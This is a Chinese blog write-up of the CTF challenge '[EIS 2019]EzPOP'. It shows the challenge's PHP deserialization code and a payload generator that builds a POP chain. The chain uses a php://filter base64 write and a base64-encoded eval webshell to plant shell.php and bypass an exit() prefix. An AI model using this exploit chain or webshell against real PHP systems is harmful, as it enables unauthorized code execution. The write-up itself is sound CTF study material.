[EIS 2019]EzPOP

最新推荐文章于 2023-03-31 01:48:05 发布
最新推荐文章于 2023-03-31 01:48:05 发布
阅读量248 收藏
点赞数
分类专栏: RCE php反序列化 代码审计 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/116223200
版权
本文详细分析了一个PHP代码片段,涉及类的构造、析构方法以及文件写入操作。通过构造特定的payload,利用base64解码特性绕过限制,实现数据写入并执行恶意代码,从而可能导致安全风险。文章讨论了如何通过设置类属性和方法,结合base64编码的特性,绕过代码中的过滤机制,最终达到执行自定义shell的目的。
摘要由CSDN通过智能技术生成 
<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

审计下来能利用的魔法函数不多,看到file_put_contents知道应该是要写shell了。
先来看看payload

<?php
    class A{
        protected $store;
        protected $key;
        protected $expire;

        public function __construct(){
            $this->key = 'shell.php';
            $this->store = new B();
            $this->cache = array();
            $this->autosave = false;
            $this->complete = base64_encode('xxx'.'PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+');
            $this->expire = 0;
        }
    }


    class B{
        public $options;
        public function __construct(){
            $this->options['prefix'] = "php://filter/write=convert.base64-decode/resource=";
            $this->options['data_compress'] = false;
            $this->options['serialize'] = 'base64_decode';
        }

    }

    $a = new A();
    echo urlencode(serialize($a));

先来看A类

public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

看到save方法里用了$this->store->set(),而set方法是在B类里面定义的,显然构造pop时$this->store=new B();
再来看看 B类
在这里插入图片描述
$data是$valuse经过了serialize方法的处理,最后被写入文件中,$value是A类中的cache传入的,cache又经过了A类中的cleanContents方法处理后又经过json编码,我们来看看cleanContents这个方法。

public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

实际上是经过取交集处理。array_intersect_key方法取两个数组的交集。
重点:base64解码有一个特性,就是会自动忽略不合法的字符
我们来本地测试。

<?php
    $contents = array();
    $complete = base64_encode('fmyyy');
    echo json_encode([$contents,$complete]).'<br>';
    echo base64_decode(json_encode([$contents,$complete]));

假设我们传入空数组,那么经过cleanContents处理后还是空数组,可以忽略,来看看上面代码的结果。
在这里插入图片描述
我们将符合base64编码的字符和空数组进行json编码后再进行base64解码,因为[ , 不符合base64解码的规则,所以被自动忽略,只剩下我们符合base64规则的字符串。
在这里插入图片描述
看到B类中,serialize是我们可控的,所以,我们只要将serialize赋值为base64_decode,再利用特性,即可将$data赋值为我们想要的值。
这道题还有一个地方要利用这个特性:

$data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;

看到这里,如果正常传入,我们的shell前面会有个exit()函数,会直接退出,无法执行shell。
再来看看我们的payload:
在这里插入图片描述
将以base64解码的方式写入文件,所以前面不符合的内容会被忽略,剩下符合规则的9个字符。但因为base64解码4个为一组,所以补上三个xxx让他解码成功。
在这里插入图片描述
至于其他属性都是细节内容就不再细说了,重点就是利用base64解码会忽略不合法字符的性质
在这里插入图片描述
最后配合shell拿到flag。

fmyyy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[2019EIS高校运维赛]ezupload
xlcvv的博客
04-17 3155
ezupload ezbypass 一、ezupload 先来一个之前的思路 随意输入username和oassword: 又试了一下万能密码,也是login failed,那就想到了sql注入,抓包另存为txt文件: 用username做注入点,失败。看了大佬的wp后才知道,网页源码下有个小提示: 下载下来,是个swp文件: swp文件是文件在编辑的过程中,由于不正当结束,会存在修...
电化学阻抗谱(EIS)测量系统设计
01-20
电路功能与优势 图 1 所示的电路是电化学阻抗 谱(EIS)测量 系统,用于表征锂离子(Li-Ion)和其他类型的电池 。EIS 是一种用于检测电化学系统内部发生的过程的安全扰动技术。该系统测量电池在一定频率范围内的...
EIS2019-EzPOP
ro4lsc的博客
05-14 1427
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
eis.rar_eis_eis group 如何?
09-24
Discuz!模板 适用版本: Discuz! X2 语言编码: GBK简体 风格转换者: 原创 ...离开的人怀念这里的热干面,精武鸭,还有这里的人和事,Eis_010城市空间Discuz!X2.0模板发布,想想你怀念的是哪座城市呢?
EIS电路拟合AZSimDemo
06-07
**EIS电路拟合AZSimDemo详解** 电化学阻抗谱(Electrochemical Impedance Spectroscopy,简称EIS)是一种广泛应用于电化学领域的实验技术,它通过测量在不同频率下的电化学系统的阻抗来获取系统内部的信息,如电极...
电化学阻抗分析软件EIS Spectrum Analyser 1.0 版本
05-19
电化学阻抗分析软件EIS Spectrum Analyser 1.0 版本
EIS_PANKAJ
03-21
EIS_PANKAJ】项目概述 "EIS_PANKAJ"是一个与HTML相关的项目,可能是一个网站开发或前端设计的实例。HTML(HyperText Markup Language)是构建网页的基础语言,用于描述网页的内容和结构。在"压缩包子文件的文件...
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 364
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
序列化与反序列化——[EIS 2019]EzPOP
LSYZWF的博客
11-06 361
文章目录题目解答 题目 链接:https://buuoj.cn/challenges#[EIS%202019]EzPOP 解答 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[EIS 2019]EzPOP 完整题解
qq_38338511的博客
03-31 260
这样就可以把我们传进去的$data进行解码了,上面做了演示用base64加密后再解密的一句话马儿可以忽略json_encode输出我们想要的值,这里就不能用上次的UCS-2编码和str_rot13编码方式了,因为有json_encode会乱码,学会本地测试活学活用!把$key传入了B类的set()方法的$name->最终传入了B类的set()方法的$filename。把$contents返回到了save()的$value->最终传入了B类的set()方法的$data。接着看进入B类的set()方法。
[EIS 2019]EzPOP 代码审查
qq_54929891的博客
05-08 387
源码 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flag.php', $expire = null) { $this->key = $key; $this->store = $store;
[EIS 2019]EzPOP-PHP代码审计学习
cjdgg的博客
03-09 299
[EIS 2019]EzPOP-PHP代码审计学习 作为一个不太聪明的WEB安全菜鸟,代码审计一直不咋地,正好遇到一道题,记录一下学习过程 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 1129
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
BUUCTF__[EIS 2019]EzPOP_题解
风过江南乱的博客
04-28 1009
BUUCTF__[EIS 2019]EzPOP_题解 php反序列化
WIFI测试 EIS
最新发布
08-21
WIFI测试EIS通常是指Wi-Fi信号环境影响评估系统(Wireless Fidelity Environmental Impact System),它是一种用于评估无线网络性能、干扰以及信号覆盖情况的专业工具。在Wi-Fi网络设计或故障排查过程中,EIS会帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值